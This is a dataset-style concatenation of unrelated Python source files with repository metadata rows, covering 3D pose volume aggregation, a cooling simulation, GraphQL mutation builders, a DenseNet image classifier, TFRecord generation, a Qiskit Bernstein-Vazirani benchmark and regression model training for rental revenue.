volume_batch[batch_i] = (volume_batch_to_aggregate * vol_confidences[batch_i].view(n_views, n_joints, 1, 1, 1)).sum(0)
elif volume_aggregation_method == 'sum':
volume_batch[batch_i] = volume_batch_to_aggregate.sum(0)
elif volume_aggregation_method == 'max':
volume_batch[batch_i] = volume_batch_to_aggregate.max(0)[0]
elif volume_aggregation_method == 'softmax':
volume_batch_to_aggregate_softmin = volume_batch_to_aggregate.clone() # 2x32x64x64x64(n_views, n_joints, *volume_shape)
volume_batch_to_aggregate_softmin = volume_batch_to_aggregate_softmin.view(n_views, -1) # reshape
volume_batch_to_aggregate_softmin = nn.functional.softmax(volume_batch_to_aggregate_softmin, dim=0)
volume_batch_to_aggregate_softmin = volume_batch_to_aggregate_softmin.view(n_views, n_joints, *volume_shape) #reshape back
volume_batch[batch_i] = (volume_batch_to_aggregate * volume_batch_to_aggregate_softmin).sum(0)
else:
raise ValueError("Unknown volume_aggregation_method: {}".format(volume_aggregation_method))
return volume_batch
def gaussian_2d_pdf(coords, means, sigmas, normalize=True):
normalization = 1.0
if normalize:
normalization = (2 * np.pi * sigmas[:, 0] * sigmas[:, 0])
exp = torch.exp(-((coords[:, 0] - means[:, 0]) ** 2 / sigmas[:, 0] ** 2 + (coords[:, 1] - means[:, 1]) ** 2 / sigmas[:, 1] ** 2) / 2)
return exp / normalization
def render_points_as_2d_gaussians(points, sigmas, image_shape, normalize=True):
device = points.device
n_points = points.shape[0]
yy, xx = torch.meshgrid(torch.arange(image_shape[0]).to(device), torch.arange(image_shape[1]).to(device))
grid = torch.stack([xx, yy], dim=-1).type(torch.float32)
grid = grid.unsqueeze(0).repeat(n_points, 1, 1, 1) # (n_points, h, w, 2)
grid = grid.reshape((-1, 2))
points = points.unsqueeze(1).unsqueeze(1).repeat(1, image_shape[0], image_shape[1], 1)
points = points.reshape(-1, 2)
sigmas = sigmas.unsqueeze(1).unsqueeze(1).repeat(1, image_shape[0], image_shape[1], 1)
sigmas = sigmas.reshape(-1, 2)
images = gaussian_2d_pdf(grid, points, sigmas, normalize=normalize)
images = images.reshape(n_points, *image_shape)
return images
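# --- Hedged usage sketch (not part of the original module) ---
# The docstring of integrate_tensor_2d describes softmaxing each heatmap and taking
# the expectation over pixel coordinates (a soft-argmax). The snippet below is a
# minimal self-check of that behaviour on a synthetic heatmap; the tensor sizes and
# the peak location are illustrative assumptions only.
if __name__ == "__main__":
    dummy = torch.full((1, 1, 64, 64), -10.0)  # batch=1, one heatmap, 64x64 pixels
    dummy[0, 0, 20, 40] = 10.0                 # sharp peak at row y=20, column x=40
    coords = integrate_tensor_2d(dummy, softmax=True)
    print(coords)  # expected to be close to [[[40., 20.]]] (x, y order)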
| 42.730964
| 162
| 0.68698
|
af3172a258cfae833fce2b37178759d67dc14d66
| 899
|
py
|
Python
|
Assignments/cooling.py
|
jonestcharles/physics-simulation
|
cfdb27f1f560b01f901e7b1796d2a695ffce6493
|
[
"MIT"
] | null | null | null |
Assignments/cooling.py
|
jonestcharles/physics-simulation
|
cfdb27f1f560b01f901e7b1796d2a695ffce6493
|
[
"MIT"
] | null | null | null |
Assignments/cooling.py
|
jonestcharles/physics-simulation
|
cfdb27f1f560b01f901e7b1796d2a695ffce6493
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 09 12:12:57 2016
@author: jone0208
"""
import matplotlib.pyplot as plt
import Body
import Solver
import Simulation
def main():
coffee = Body.ThermalBody(500)
solver = Solver.Euler(0.5)
def stop_condition(coffee):
return coffee.temperature > sim.Ta*1.1
sim = Simulation.CoolingSim(stop_condition,solver,293,0.05,coffee)
t,T = sim.get_results()
plt.plot(t,T)
coffee = Body.ThermalBody(500)
solver = Solver.RK2(0.5)
def stop_condition(coffee):
return coffee.temperature > sim.Ta*1.1
sim = Simulation.CoolingSim(stop_condition,solver,293,0.05,coffee)
t,T = sim.get_results()
plt.plot(t,T)
plt.title("OOP Cooling Curves")
plt.xlabel("Time [s]")
plt.ylabel("Temperature[K]")
plt.legend(["Euler Curve","RK2 Cooling Curve"])
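    # Hedged addition (not in the original): when run as a plain script rather than
    # in an inline-plotting IDE, the figure is never displayed without show().
    plt.show()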
if __name__ == "__main__": main()
| 25.685714
| 70
| 0.65406
|
7a784d459d56b919655db95363986b4e446c6ce0
| 3,242
|
py
|
Python
|
trompace/mutations/application.py
|
trompamusic/ce-queries-template
|
cc5ae69d0e76623bfd72e9453f569f6624bf7c3b
|
[
"Apache-2.0"
] | 1
|
2020-06-18T15:43:18.000Z
|
2020-06-18T15:43:18.000Z
|
trompace/mutations/application.py
|
trompamusic/ce-queries-template
|
cc5ae69d0e76623bfd72e9453f569f6624bf7c3b
|
[
"Apache-2.0"
] | 60
|
2019-12-17T11:08:28.000Z
|
2021-03-02T16:19:41.000Z
|
trompace/mutations/application.py
|
trompamusic/trompace-client
|
cc5ae69d0e76623bfd72e9453f569f6624bf7c3b
|
[
"Apache-2.0"
] | null | null | null |
# Generate GraphQL queries for mutations pertaining to software applications.
from trompace.exceptions import UnsupportedLanguageException, NotAMimeTypeException
from trompace import StringConstant, filter_none_args
from .templates import mutation_create, mutation_link
from ..constants import SUPPORTED_LANGUAGES
CREATE_APPLICATION = '''CreateSoftwareApplication(
{parameters}
) {{
identifier
}}'''
ADD_ENTRYPOINT_APPLICATION = '''AddEntryPointActionApplication(
from: {{identifier: "{identifier_1}"}}
to: {{identifier: "{identifier_2}"}}
){{
from {{
identifier
}}
to {{
identifier
}}
}}'''
def mutation_create_application(*, name: str, contributor: str, creator: str, source: str, title: str = None,
subject: str = None, language: str = None, description: str = None, format_: str = None,
softwareversion: str = None):
"""Returns a mutation for creating a software application object
Arguments:
name: The name of the software application.
title: the html title of the page at `source`
contributor: A person, an organization, or a service responsible for adding the software application. This can be either a name or a base URL.
creator: The person, organization or service responsible for adding the software application.
source: The URL of the web resource to be represented by the node.
subject: The subject associated with the application.
description: An account of the software application.
language: The language of the page at `source`. Currently supported languages are en,es,ca,nl,de,fr
softwareversion: the version of the software
Returns:
The string for the mutation for creating the artist.
Raises:
UnsupportedLanguageException if the input language is not one of the supported languages.
NotAMimeTypeException if format_ is not a valid mimetype.
"""
if language and language not in SUPPORTED_LANGUAGES:
raise UnsupportedLanguageException(language)
if format_ and "/" not in format_:
raise NotAMimeTypeException(format_)
args = {
"name": name,
"contributor": contributor,
"creator": creator,
"source": source,
"title": title,
"subject": subject,
"description": description,
"format": format_,
"softwareVersion": softwareversion
}
if language:
args["language"] = StringConstant(language.lower())
args = filter_none_args(args)
return mutation_create(args, CREATE_APPLICATION)
def mutation_add_entrypoint_application(application_id: str, entrypoint_id: str):
"""Returns a mutation for adding an entry point to an application..
Arguments:
application_id: The unique identifier of the application object.
entrypoint_id: The unique identifier of the entrypoint.
Returns:
The string for the mutation for creating a relation between an application and an entry point.
"""
return mutation_link(entrypoint_id, application_id, ADD_ENTRYPOINT_APPLICATION)
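# --- Hedged usage sketch (not part of the original module) ---
# Illustrates the shape of a mutation_create_application call described in the
# docstring above; every value below (names, URLs, version) is a made-up
# placeholder, not data from a real TROMPA deployment.
if __name__ == "__main__":
    query = mutation_create_application(
        name="Example App",
        contributor="https://example.org",
        creator="https://example.org",
        source="https://example.org/app",
        language="en",
        softwareversion="0.1.0",
    )
    print(query)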
| 40.525
| 150
| 0.677977
|
c67a668aad9331ac2867adbe0b0c335204f997cb
| 4,717
|
py
|
Python
|
public/model_loader.py
|
DaibinRaju/Omnis-Agro
|
3b25f736eef151fe62dabc66eaa19a05c4f82140
|
[
"MIT"
] | null | null | null |
public/model_loader.py
|
DaibinRaju/Omnis-Agro
|
3b25f736eef151fe62dabc66eaa19a05c4f82140
|
[
"MIT"
] | 1
|
2022-02-27T05:11:32.000Z
|
2022-02-27T05:11:32.000Z
|
public/model_loader.py
|
DaibinRaju/Omnis-Agro
|
3b25f736eef151fe62dabc66eaa19a05c4f82140
|
[
"MIT"
] | null | null | null |
import torch
from torch import nn
from torchvision import models
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
import sys
def load_checkpoint(filepath):
'''
input: filepath of the saved model
return: a model loaded from the path
checks if the model saved is a densenet 121 model and defining our own classifier
'''
checkpoint = torch.load(filepath)
if checkpoint['arch'] == 'densenet121':
model = models.densenet121(pretrained=True)
for param in model.parameters():
param.requires_grad = False
    else:
        # The classifier below assumes a densenet121 backbone, so fail fast here
        # instead of falling through with an undefined `model`.
        raise ValueError("Architecture not recognized: expected 'densenet121'.")
model.class_to_idx = checkpoint['class_to_idx']
model.classifier = nn.Sequential(nn.Linear(1024, 512),
nn.ReLU(),
nn.Linear(512, 9),
nn.LogSoftmax(dim=1))
model.load_state_dict(checkpoint['model_state_dict'])
return model
model = load_checkpoint('checkpoint.pth')
#loading the model from the memory
def process_image(image_path):
''' input: path of the image to be processed
Scales, crops, and normalizes a PIL image for a PyTorch model,
returns an Numpy array
'''
# Process a PIL image for use in a PyTorch model
pil_image = Image.open(image_path)
# Resize
if pil_image.size[0] > pil_image.size[1]:
pil_image.thumbnail((5000, 256))
else:
pil_image.thumbnail((256, 5000))
# Crop
left_margin = (pil_image.width-224)/2
bottom_margin = (pil_image.height-224)/2
right_margin = left_margin + 224
top_margin = bottom_margin + 224
pil_image = pil_image.crop((left_margin, bottom_margin, right_margin, top_margin))
# Normalize
np_image = np.array(pil_image)/255
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
np_image = (np_image - mean) / std
# PyTorch expects the color channel to be the first dimension but it's the third dimension in the PIL image and Numpy array
# Color channel needs to be first; retain the order of the other two dimensions.
np_image = np_image.transpose((2, 0, 1))
return np_image
def imshow(image, ax=None, title=None):
'''
input: a numpy array of the image created by the process_image fn
'''
if ax is None:
fig, ax = plt.subplots()
# PyTorch tensors assume the color channel is the first dimension
# but matplotlib assumes is the third dimension
image = image.transpose((1, 2, 0))
# Undo preprocessing (remove the normalization)
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
image = std * image + mean
if title is not None:
ax.set_title(title)
# Image needs to be clipped between 0 and 1 or it looks like noise when displayed
image = np.clip(image, 0, 1)
ax.imshow(image)
return ax
def predict(image_path, model, print_image=0, topk=5):
'''
input: image path of image, model to be used, boolean print_image to print the image
and no of top probabilities
Predict the class (or classes) of an image using a trained deep learning model.
prints top probabilities and indices
'''
model.eval()
if(torch.cuda.is_available()):
model.to('cuda')
image = process_image(image_path)
if(print_image):
imshow(image)
# Convert image to PyTorch tensor first
if(torch.cuda.is_available()):
image = torch.from_numpy(image).type(torch.cuda.FloatTensor)
else:
image = torch.from_numpy(image).type(torch.FloatTensor)
# Returns a new tensor with a dimension of size one inserted at the specified position.
image = image.unsqueeze(0)
with torch.no_grad():
output = model.forward(image)
probabilities = torch.exp(output)
# Probabilities and the indices of those probabilities corresponding to the classes
top_probabilities, top_indices = probabilities.topk(topk)
#print(top_probabilities)
#print(top_indices)
# Convert to lists
top_probabilities = top_probabilities.detach().type(torch.FloatTensor).numpy().tolist()[0]
top_indices = top_indices.detach().type(torch.FloatTensor).numpy().tolist()[0]
for i in top_indices:
print(i,end=" ")
for i in top_probabilities:
print('{:.4f}'.format(i*100),end=" ")
#print(top_probabilities)
#print(top_indices)
imageFile=sys.argv[1]
#predict('9.jpg', model)
predict(imageFile, model)
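# --- Hedged helper sketch (not part of the original script) ---
# model.class_to_idx is restored from the checkpoint above but never used; if class
# names are wanted instead of raw indices, the mapping can be inverted like this.
# It assumes the usual torchvision convention of {class_name: index}, which is not
# verified against this particular checkpoint.
def indices_to_class_names(model, indices):
    idx_to_class = {v: k for k, v in model.class_to_idx.items()}
    return [idx_to_class[int(i)] for i in indices]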
| 29.85443
| 127
| 0.637693
|
6053cc416f53a962bbcba85e2a8a0d52722a0e9a
| 4,859
|
py
|
Python
|
generate_tfrecord.py
|
AlfredPro/object_detection_demo
|
949d5dc42f0ae3669ad35c1c1fcb634e4d234c4a
|
[
"MIT"
] | null | null | null |
generate_tfrecord.py
|
AlfredPro/object_detection_demo
|
949d5dc42f0ae3669ad35c1c1fcb634e4d234c4a
|
[
"MIT"
] | null | null | null |
generate_tfrecord.py
|
AlfredPro/object_detection_demo
|
949d5dc42f0ae3669ad35c1c1fcb634e4d234c4a
|
[
"MIT"
] | null | null | null |
"""
Usage:
# Create train data:
python generate_tfrecord.py --label=<LABEL> --csv_input=<PATH_TO_ANNOTATIONS_FOLDER>/train_labels.csv --output_path=<PATH_TO_ANNOTATIONS_FOLDER>/train.record --label_map <PATH_TO_ANNOTATIONS_FOLDER>/label_map.pbtxt
# Create test data:
python generate_tfrecord.py --label=<LABEL> --csv_input=<PATH_TO_ANNOTATIONS_FOLDER>/test_labels.csv --output_path=<PATH_TO_ANNOTATIONS_FOLDER>/test.record --label_map <PATH_TO_ANNOTATIONS_FOLDER>/label_map.pbtxt
"""
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import os
import io
import pandas as pd
#import tensorflow.compat.v1 as tf
import tensorflow as tf
import sys
sys.path.append("../../models/research")
from PIL import Image
from object_detection.utils import dataset_util
from collections import namedtuple, OrderedDict
flags = tf.app.flags
flags.DEFINE_string("csv_input", "", "Path to the CSV input")
flags.DEFINE_string("output_path", "", "Path to output TFRecord")
flags.DEFINE_string(
"label_map",
"",
"Path to the `label_map.pbtxt` contains the <class_name>:<class_index> pairs generated by `xml_to_csv.py` or manually.",
)
# if your image has more labels input them as
# flags.DEFINE_string('label0', '', 'Name of class[0] label')
# flags.DEFINE_string('label1', '', 'Name of class[1] label')
# and so on.
flags.DEFINE_string("img_path", "", "Path to images")
FLAGS = flags.FLAGS
def split(df, group):
data = namedtuple("data", ["filename", "object"])
gb = df.groupby(group)
return [
data(filename, gb.get_group(x))
for filename, x in zip(gb.groups.keys(), gb.groups)
]
def create_tf_example(group, path, label_map):
with tf.gfile.GFile(os.path.join(path, "{}".format(group.filename)), "rb") as fid:
encoded_jpg = fid.read()
encoded_jpg_io = io.BytesIO(encoded_jpg)
image = Image.open(encoded_jpg_io)
width, height = image.size
filename = group.filename.encode("utf8")
image_format = b"jpg"
# check if the image format is matching with your images.
xmins = []
xmaxs = []
ymins = []
ymaxs = []
classes_text = []
classes = []
for index, row in group.object.iterrows():
xmins.append(row["xmin"] / width)
xmaxs.append(row["xmax"] / width)
ymins.append(row["ymin"] / height)
ymaxs.append(row["ymax"] / height)
classes_text.append(str(row["class"]).encode("utf8"))
class_index = label_map.get(str(row["class"]))
assert (
class_index is not None
), "class label: `{}` not found in label_map: {}".format(
row["class"], label_map
)
classes.append(class_index)
tf_example = tf.train.Example(
features=tf.train.Features(
feature={
"image/height": dataset_util.int64_feature(height),
"image/width": dataset_util.int64_feature(width),
"image/filename": dataset_util.bytes_feature(filename),
"image/source_id": dataset_util.bytes_feature(filename),
"image/encoded": dataset_util.bytes_feature(encoded_jpg),
"image/format": dataset_util.bytes_feature(image_format),
"image/object/bbox/xmin": dataset_util.float_list_feature(xmins),
"image/object/bbox/xmax": dataset_util.float_list_feature(xmaxs),
"image/object/bbox/ymin": dataset_util.float_list_feature(ymins),
"image/object/bbox/ymax": dataset_util.float_list_feature(ymaxs),
"image/object/class/text": dataset_util.bytes_list_feature(
classes_text
),
"image/object/class/label": dataset_util.int64_list_feature(classes),
}
)
)
return tf_example
def main(_):
writer = tf.python_io.TFRecordWriter(FLAGS.output_path)
path = os.path.join(os.getcwd(), FLAGS.img_path)
examples = pd.read_csv(FLAGS.csv_input)
# Load the `label_map` from pbtxt file.
from object_detection.utils import label_map_util
label_map = label_map_util.load_labelmap(FLAGS.label_map)
categories = label_map_util.convert_label_map_to_categories(
label_map, max_num_classes=90, use_display_name=True
)
category_index = label_map_util.create_category_index(categories)
label_map = {}
for k, v in category_index.items():
label_map[v.get("name")] = v.get("id")
grouped = split(examples, "filename")
for group in grouped:
tf_example = create_tf_example(group, path, label_map)
writer.write(tf_example.SerializeToString())
writer.close()
output_path = os.path.join(os.getcwd(), FLAGS.output_path)
print("Successfully created the TFRecords: {}".format(output_path))
if __name__ == "__main__":
tf.app.run()
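# --- Hedged example (not part of the original script) ---
# The --label_map flag expects the TF Object Detection API pbtxt format; a minimal
# two-class file looks like the block below (class names are placeholders).
#
# item {
#   id: 1
#   name: 'cat'
# }
# item {
#   id: 2
#   name: 'dog'
# }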
| 35.727941
| 214
| 0.672566
|
1d80587b643f972695a8e758a576cc05416874df
| 5,469
|
py
|
Python
|
data/p3BR/R1/benchmark/startQiskit_QC402.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p3BR/R1/benchmark/startQiskit_QC402.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
data/p3BR/R1/benchmark/startQiskit_QC402.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=3
# total number=72
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename=(kernel + '-oracle.png'))
return oracle
def build_circuit(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the Bernstein-Vazirani circuit
zero = np.binary_repr(0, n)
b = f(zero)
# initial n + 1 bits
input_qubit = QuantumRegister(n+1, "qc")
classicals = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classicals)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(input_qubit[n])
# circuit begin
prog.h(input_qubit[1]) # number=1
prog.rx(-0.09738937226128368,input_qubit[2]) # number=2
prog.h(input_qubit[1]) # number=33
prog.y(input_qubit[2]) # number=56
prog.cz(input_qubit[2],input_qubit[1]) # number=34
prog.h(input_qubit[1]) # number=35
prog.h(input_qubit[1]) # number=3
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[n])
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [input_qubit[n]])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
# measure
return prog
def get_statevector(prog: QuantumCircuit) -> Any:
state_backend = Aer.get_backend('statevector_simulator')
statevec = execute(prog, state_backend).result()
quantum_state = statevec.get_statevector()
qubits = round(log2(len(quantum_state)))
quantum_state = {
"|" + np.binary_repr(i, qubits) + ">": quantum_state[i]
for i in range(2 ** qubits)
}
return quantum_state
def evaluate(backend_str: str, prog: QuantumCircuit, shots: int, b: str) -> Any:
# Q: which backend should we use?
# get state vector
quantum_state = get_statevector(prog)
# get simulate results
# provider = IBMQ.load_account()
# backend = provider.get_backend(backend_str)
# qobj = compile(prog, backend, shots)
# job = backend.run(qobj)
# job.result()
backend = Aer.get_backend(backend_str)
# transpile/schedule -> assemble -> backend.run
results = execute(prog, backend, shots=shots).result()
counts = results.get_counts()
a = Counter(counts).most_common(1)[0][0][::-1]
return {
"measurements": counts,
# "state": statevec,
"quantum_state": quantum_state,
"a": a,
"b": b
}
def bernstein_test_1(rep: str):
"""011 . x + 1"""
a = "011"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_2(rep: str):
"""000 . x + 0"""
a = "000"
b = "0"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_3(rep: str):
"""111 . x + 1"""
a = "111"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
if __name__ == "__main__":
n = 2
a = "11"
b = "1"
f = lambda rep: \
bitwise_xor(bitwise_dot(a, rep), b)
prog = build_circuit(n, f)
    sample_shot = 4000
writefile = open("../data/startQiskit_QC402.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_belem")
circuit1 = transpile(prog, FakeYorktown())
circuit1.h(qubit=2)
circuit1.x(qubit=3)
circuit1.measure_all()
info = execute(circuit1,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
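# --- Hedged sketch (not part of the original script) ---
# bernstein_test_1 encodes the classical function f(x) = (011 . x) + 1 over GF(2),
# which is what a Bernstein-Vazirani circuit built from it is meant to recover.
# This helper just tabulates it for all 3-bit inputs; it is illustrative only and
# is not called anywhere in the original flow.
def demo_bernstein_test_1():
    for rep in ["000", "001", "010", "011", "100", "101", "110", "111"]:
        print(rep, "->", bernstein_test_1(rep))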
| 29.090426
| 140
| 0.629366
|
0494ef7d345738254004903ce4758167057e8ba9
| 7,432
|
py
|
Python
|
src/models/train_model.py
|
carolmoraescruz/case_seazone
|
76b44a64272685681442929c04ea9e4fd21a147e
|
[
"MIT"
] | null | null | null |
src/models/train_model.py
|
carolmoraescruz/case_seazone
|
76b44a64272685681442929c04ea9e4fd21a147e
|
[
"MIT"
] | null | null | null |
src/models/train_model.py
|
carolmoraescruz/case_seazone
|
76b44a64272685681442929c04ea9e4fd21a147e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import pandas as pd
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.neural_network import MLPRegressor
from xgboost import XGBRegressor
from sklearn.metrics import mean_absolute_error as mae
from src import (
PATH_PREPROCESSOR_COVID_IMPACT,
PATH_PREPROCESSOR_PRICE_MODEL_Q1,
PATH_PREPROCESSOR_RESERVATIONS_MODEL_Q3,
PATH_PREPROCESSOR_REVENUE_MODEL_Q1,
PATH_PREPROCESSOR_REVENUE_MODEL_Q2,
PATH_REGRESSOR_COVID_IMPACT,
PATH_REGRESSOR_PRICE_MODEL_Q1,
PATH_REGRESSOR_RESERVATIONS_MODEL_Q3,
PATH_REGRESSOR_REVENUE_MODEL_Q1,
PATH_REGRESSOR_REVENUE_MODEL_Q2,
)
from src.features.build_features import (
build_features_covid_impact_model,
build_features_reservations_model_q3,
build_features_revenue_model_q1,
build_features_revenue_model_q2,
build_features_price_model_q1,
)
from src.models.preprocessing import (
fit_preprocess_covid_impact_model,
fit_preprocess_price_model_q1,
fit_preprocess_reservations_model_q3,
fit_preprocess_revenue_model_q2,
preprocess_transform,
)
from src.commons import dump_pickle
def train_price_model_q1(df_listings: pd.DataFrame, df_daily_revenue: pd.DataFrame):
"""Trains the price estimator to be used on question 1.
Parameters
----------
df_listings : pd.DataFrame
Pandas dataframe with information about listings.
df_daily_revenue : pd.DataFrame
Pandas dataframe with information about daily revenue.
Returns
-------
    None
        Fits the regressor, prints the test MAE, and saves the fitted
        preprocessor and model to disk as pickles.
"""
print("Training price model - Q1")
X, y = build_features_price_model_q1(df_listings, df_daily_revenue)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.3, random_state=42
)
preprocessor = fit_preprocess_price_model_q1(X_train)
X_train = preprocess_transform(X_train, preprocessor)
X_test = preprocess_transform(X_test, preprocessor)
model = XGBRegressor(max_depth=6, n_estimators=300).fit(X_train, y_train)
score = mae(y_test, model.predict(X_test))
dump_pickle(preprocessor, PATH_PREPROCESSOR_PRICE_MODEL_Q1)
dump_pickle(model, PATH_REGRESSOR_PRICE_MODEL_Q1)
print("MAE(teste) = {:.2f}".format(score))
def train_revenue_model_q1(df_listings: pd.DataFrame, df_daily_revenue: pd.DataFrame):
"""Trains the revenue estimator to be used on question 1.
Parameters
----------
df_listings : pd.DataFrame
Pandas dataframe with information about listings.
df_daily_revenue : pd.DataFrame
Pandas dataframe with information about daily revenue.
Returns
-------
    None
        Fits the regressor, prints the test MAE, and saves the fitted
        preprocessor and model to disk as pickles.
"""
print("Training revenue model - Q1")
X, y = build_features_revenue_model_q1(df_listings, df_daily_revenue)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.3, random_state=42
)
preprocessor = fit_preprocess_revenue_model_q2(X_train)
X_train = preprocess_transform(X_train, preprocessor)
X_test = preprocess_transform(X_test, preprocessor)
model = XGBRegressor(max_depth=6, n_estimators=300).fit(X_train, y_train)
score = mae(y_test, model.predict(X_test))
dump_pickle(preprocessor, PATH_PREPROCESSOR_REVENUE_MODEL_Q1)
dump_pickle(model, PATH_REGRESSOR_REVENUE_MODEL_Q1)
print("MAE(teste) = {:.2f}".format(score))
def train_revenue_model_q2(df_listings: pd.DataFrame, df_daily_revenue: pd.DataFrame):
"""Trains the revenue estimator to be used on question 2.
Parameters
----------
df_listings : pd.DataFrame
Pandas dataframe with information about listings.
df_daily_revenue : pd.DataFrame
Pandas dataframe with information about daily revenue.
Returns
-------
    None
        Fits the regressor, prints the test MAE, and saves the fitted
        preprocessor and model to disk as pickles.
"""
print("Training revenue model - Q2")
X, y = build_features_revenue_model_q2(df_listings, df_daily_revenue)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.3, random_state=42
)
preprocessor = fit_preprocess_revenue_model_q2(X_train)
X_train = preprocess_transform(X_train, preprocessor)
X_test = preprocess_transform(X_test, preprocessor)
model = MLPRegressor(
hidden_layer_sizes=(5, 10, 10, 5, 5),
solver="lbfgs",
learning_rate="adaptive",
learning_rate_init=0.03,
max_iter=10000,
random_state=42,
).fit(X_train, y_train)
score = mae(y_test, model.predict(X_test))
dump_pickle(preprocessor, PATH_PREPROCESSOR_REVENUE_MODEL_Q2)
dump_pickle(model, PATH_REGRESSOR_REVENUE_MODEL_Q2)
print("MAE(teste) = {:.2f}".format(score))
def train_reservations_model_q3(df_daily_revenue: pd.DataFrame):
"""Trains the revenue estimator to be used on question 3.
Parameters
----------
df_daily_revenue : pd.DataFrame
Pandas dataframe with information about daily revenue.
Returns
-------
    None
        Fits the regressor, prints the test MAE, and saves the fitted
        preprocessor and model to disk as pickles.
"""
print("Training reservations model - Q3")
X, y = build_features_reservations_model_q3(df_daily_revenue)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.3, random_state=42
)
preprocessor = fit_preprocess_reservations_model_q3(X_train)
X_train = preprocess_transform(X_train, preprocessor)
X_test = preprocess_transform(X_test, preprocessor)
model = XGBRegressor(max_depth=6, n_estimators=100, reg_alpha=0.5).fit(
X_train, y_train
)
score = mae(y_test, model.predict(X_test))
dump_pickle(preprocessor, PATH_PREPROCESSOR_RESERVATIONS_MODEL_Q3)
dump_pickle(model, PATH_REGRESSOR_RESERVATIONS_MODEL_Q3)
print("MAE(teste) = {:.2f}".format(score))
def train_covid_impact_model(df_listings: pd.DataFrame, df_daily_revenue: pd.DataFrame):
"""Trains the revenue estimator to be used to estimate covid-19 impact.
Parameters
----------
df_listings : pd.DataFrame
Pandas dataframe with information about listings.
df_daily_revenue : pd.DataFrame
Pandas dataframe with information about daily revenue.
Returns
-------
    None
        Fits the regressor, prints the test MAE, and saves the fitted
        preprocessor and model to disk as pickles.
"""
print("Training model for covid-19 impact on revenue")
X, y = build_features_covid_impact_model(df_listings, df_daily_revenue)
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.3, random_state=42
)
preprocessor = fit_preprocess_covid_impact_model(X_train)
X_train = preprocess_transform(X_train, preprocessor)
X_test = preprocess_transform(X_test, preprocessor)
model = RandomForestRegressor(n_estimators=100, random_state=42).fit(
X_train, y_train
)
score = mae(y_test, model.predict(X_test))
dump_pickle(preprocessor, PATH_PREPROCESSOR_COVID_IMPACT)
dump_pickle(model, PATH_REGRESSOR_COVID_IMPACT)
print("MAE(teste) = {:.2f}".format(score))
| 29.728
| 89
| 0.702503
|
dd98c24bfe5f6a450bf4dcecf83039b06d464fbe
| 3,346
|
py
|
Python
|
spotty/providers/abstract_instance_manager.py
|
vexcel-data/spotty
|
f6d56129a088908a5b8dcf303867af85e3bdf325
|
[
"MIT"
] | null | null | null |
spotty/providers/abstract_instance_manager.py
|
vexcel-data/spotty
|
f6d56129a088908a5b8dcf303867af85e3bdf325
|
[
"MIT"
] | null | null | null |
spotty/providers/abstract_instance_manager.py
|
vexcel-data/spotty
|
f6d56129a088908a5b8dcf303867af85e3bdf325
|
[
"MIT"
] | null | null | null |
from abc import ABC, abstractmethod
from typing import Optional
from spotty.commands.writers.abstract_output_writrer import AbstractOutputWriter
from spotty.config.abstract_instance_config import AbstractInstanceConfig
from spotty.config.project_config import ProjectConfig
